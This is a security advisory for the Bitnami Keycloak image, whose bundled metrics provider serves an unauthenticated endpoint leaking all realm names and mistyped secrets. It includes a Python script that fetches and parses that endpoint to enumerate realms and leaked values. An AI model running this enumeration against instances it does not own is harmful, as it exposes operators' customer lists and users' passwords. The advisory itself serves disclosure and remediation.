
Realm name leak through metrics endpoint

Moderate
carrodher published GHSA-3vhw-xrrc-mvv6 Aug 10, 2025

Package: docker bitnami/keycloak (Docker)
Affected versions: *
Patched versions: 26.3.2-debian-12-r2

Package: helm bitnamicharts/keycloak (Helm)
Affected versions: *
Patched versions: 25.0.0

Description

The Bitnami Keycloak image ships the third-party provider aerogear/keycloak-metrics-spi (/opt/bitnami/keycloak/providers/keycloak-metrics-spi-*.jar). The provider adds a Prometheus-compatible scrape endpoint under each realm (/realms/{REALM_NAME}/metrics) that exposes per-request usage metrics. It is not required for Keycloak's own built-in metrics (the /metrics endpoint enabled with the metrics-enabled option).
The realm metrics endpoint is not turned off by disabling Keycloak's own metrics; it is served without authentication for as long as the provider jar is deployed. Apart from deleting the jar or blocking the path at a reverse proxy, there is no documented way to disable the provider or this specific endpoint.

Fetching the metrics endpoint of the default master realm, /realms/master/metrics, and parsing the output yields the names of all realms on the instance. The provider does not scope its metrics per realm: the same global data is returned from /realms/{REALM_NAME}/metrics for every realm.

Applying the pattern /realms/[^/"]+ to the recorded routes extracts each realm name, which can then be used to look up the realm's display name.

The data also contains paths that never resolved (for example, requests to non-existent realms): every path requested under /realms/ is recorded, whether or not it exists. This is how a secret mistakenly typed into a realm URL ends up in the metrics output.
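As an added example (not code from the advisory, Bitnami or the aerogear provider), the following Python script applies the /realms/[^/"]+ pattern from the advisory to a constructed metrics sample and separates realm names that served real responses from path segments that only ever produced 4xx errors, which is where a secret mistakenly typed into a URL would surface. The metric and label names in the sample (code, method, route, realm) are an assumption about the provider's Prometheus output format; fetch_metrics() is included only to show where live data would come from and is not called.

```python
"""Enumerate Keycloak realm names from keycloak-metrics-spi output.

Added example for this advisory; not Bitnami's or the provider's own code.
The sample below is constructed, and the label names (code, method, route,
realm) are an assumption about the provider's Prometheus exposition format.
"""
import re
import urllib.request

# Pattern quoted in the advisory: a realm name is the path segment after /realms/.
ROUTE_REALM_RE = re.compile(r'/realms/([^/"]+)')
LABEL_BLOCK_RE = re.compile(r'\{([^}]*)\}')
LABEL_PAIR_RE = re.compile(r'(\w+)="([^"]*)"')

# Constructed sample of what /realms/master/metrics might return (Prometheus text
# format, including the trailing comma the Java client emits). The 404 lines mimic
# a user who pasted a password into the realm part of a URL.
SAMPLE_METRICS = """\
# HELP keycloak_request_duration Request duration
# TYPE keycloak_request_duration histogram
keycloak_request_duration_count{code="200",method="GET",route="/realms/master/metrics",} 3.0
keycloak_request_duration_count{code="200",method="POST",route="/realms/acme-corp/protocol/openid-connect/token",} 120.0
keycloak_request_duration_count{code="200",method="GET",route="/realms/dev-sandbox/.well-known/openid-configuration",} 7.0
keycloak_request_duration_count{code="404",method="GET",route="/realms/s3cret-pass/account",} 1.0
keycloak_response_errors_total{code="404",method="GET",route="/realms/s3cret-pass/account",} 1.0
keycloak_logins_total{provider="keycloak",client_id="account-console",realm="acme-corp",} 5.0
"""


def parse_samples(text):
    """Yield (metric_name, labels, value) for every sample line; comment lines are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        head, _, value = line.rpartition(" ")
        name = head.split("{", 1)[0]
        block = LABEL_BLOCK_RE.search(head)
        labels = dict(LABEL_PAIR_RE.findall(block.group(1))) if block else {}
        yield name, labels, float(value)


def extract_realms(text):
    """Map each realm name in the metrics to the set of HTTP status codes seen for it.

    Names come from the route label (the advisory's pattern) and from any realm="..."
    label, so the result is the global view the provider exposes from any realm path.
    """
    realms = {}
    for _name, labels, _value in parse_samples(text):
        found = set(ROUTE_REALM_RE.findall(labels.get("route", "")))
        if "realm" in labels:
            found.add(labels["realm"])
        for realm in found:
            codes = realms.setdefault(realm, set())
            if "code" in labels:
                codes.add(labels["code"])
    return realms


def classify(realms):
    """Split realms into (live, probes).

    A name seen only with 4xx/5xx responses never resolved to a realm: a typo, a
    scanner, or a secret mistakenly typed into the URL. Names without any status code
    (e.g. from login counters) are treated as live.
    """
    live, probes = set(), set()
    for realm, codes in realms.items():
        if codes and all(c[0] in "45" for c in codes):
            probes.add(realm)
        else:
            live.add(realm)
    return live, probes


def fetch_metrics(base_url, realm="master"):
    """Fetch the unauthenticated metrics page of a Keycloak instance (not called here)."""
    url = f"{base_url.rstrip('/')}/realms/{realm}/metrics"
    with urllib.request.urlopen(url) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    live, probes = classify(extract_realms(SAMPLE_METRICS))
    print("realms:", sorted(live))
    print("paths that never resolved (review for leaked secrets):", sorted(probes))
```

Against the constructed sample the script reports master, acme-corp and dev-sandbox as live realms and s3cret-pass as a path that only ever returned 404. Run it against the output of fetch_metrics() for an instance you own to see what a pre-fix image exposes before upgrading.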

Impact

Listing realms (including display names) can expose sensitive details:

  • Operators – customer lists: an operator that hosts one realm per customer on its Keycloak reveals who its customers are.
  • Operators/Developers – development and staging realms become identifiable and targetable.
  • Organizations – the fact that an organization uses this IdP is disclosed.

Because every requested path under /realms/ is recorded, the metrics may also expose secrets, such as a password mistakenly typed as a realm name:

  • Operators – an easy, unauthenticated collection point; metrics output must be reviewed for leaked values.
  • Users – secrets could be unintentionally exposed.

Mitigation

The recommended action is to upgrade Keycloak to 26.3.2-1 (container image 26.3.2-debian-12-r2) or a newer version.
In the case of the Helm chart, upgrade to 25.0.0 or a newer version.
If you cannot upgrade immediately, remove keycloak-metrics-spi-*.jar from /opt/bitnami/keycloak/providers and restart, or block /realms/*/metrics at the reverse proxy. After applying the fix, confirm that an unauthenticated request to /realms/master/metrics is no longer served, and treat any realm names already exposed (including secrets mistakenly used as names) as disclosed.

Severity

Moderate

CVE ID

No known CVE

Weaknesses

No CWEs

Credits